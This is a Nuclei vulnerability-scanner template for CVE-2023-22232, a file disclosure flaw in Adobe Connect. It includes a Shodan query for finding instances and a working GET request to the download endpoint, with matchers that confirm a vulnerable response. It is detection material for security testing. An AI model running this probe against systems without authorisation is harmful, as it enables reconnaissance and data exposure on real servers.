nuclei-templates/http/cves/2023/CVE-2023-22232.yaml

47 lines
1.7 KiB
YAML
Raw Normal View History

2023-12-09 09:38:36 +00:00
id: CVE-2023-22232
info:
name: Adobe Connect < 12.1.5 - Local File Disclosure
author: 1337kro
severity: medium
description: |
Adobe Connect versions 11.4.5 (and earlier), 12.1.5 (and earlier) are affected by an Improper Access Control vulnerability that could result in a Security feature bypass. An attacker could leverage this vulnerability to impact the integrity of a minor feature. Exploitation of this issue does not require user interaction
reference:
- https://helpx.adobe.com/security/products/connect/apsb23-05.html
- https://nvd.nist.gov/vuln/detail/CVE-2023-22232
- http://packetstormsecurity.com/files/171390/Adobe-Connect-11.4.5-12.1.5-Local-File-Disclosure.html
- https://github.com/ARPSyndicate/cvemon
2023-12-09 09:38:36 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
cvss-score: 5.3
cve-id: CVE-2023-22232
cwe-id: CWE-284,NVD-CWE-noinfo
epss-score: 0.12027
epss-percentile: 0.94872
cpe: cpe:2.3:a:adobe:connect:*:*:*:*:*:*:*:*
2023-12-09 09:38:36 +00:00
metadata:
verified: true
max-request: 1
vendor: adobe
product: connect
2023-12-09 09:38:36 +00:00
shodan-query: title:"Adobe Connect"
tags: packetstorm,cve2023,cve,adobe,lfd,download
2023-12-09 09:38:36 +00:00
http:
- method: GET
path:
- "{{BaseURL}}/system/download?download-url=/_a7/p49dm7f4qjyt/output/&name=exam.pdf"
matchers-condition: and
matchers:
- type: word
words:
- "Save to My Computer"
- "exam.pdf"
- "Click to Download"
condition: and
- type: status
status:
- 200
# digest: 4a0a00473045022011127d2098a85074a0313dff3f7eb0b5b50162d5bd543d8a21af8a1eef1cc8d4022100d71ed4fcc8f5e0998b754ecc666c14488ac7266b650ea4f65c1d15760c3dbe76:922c64590222798bb761d5b6d8e72950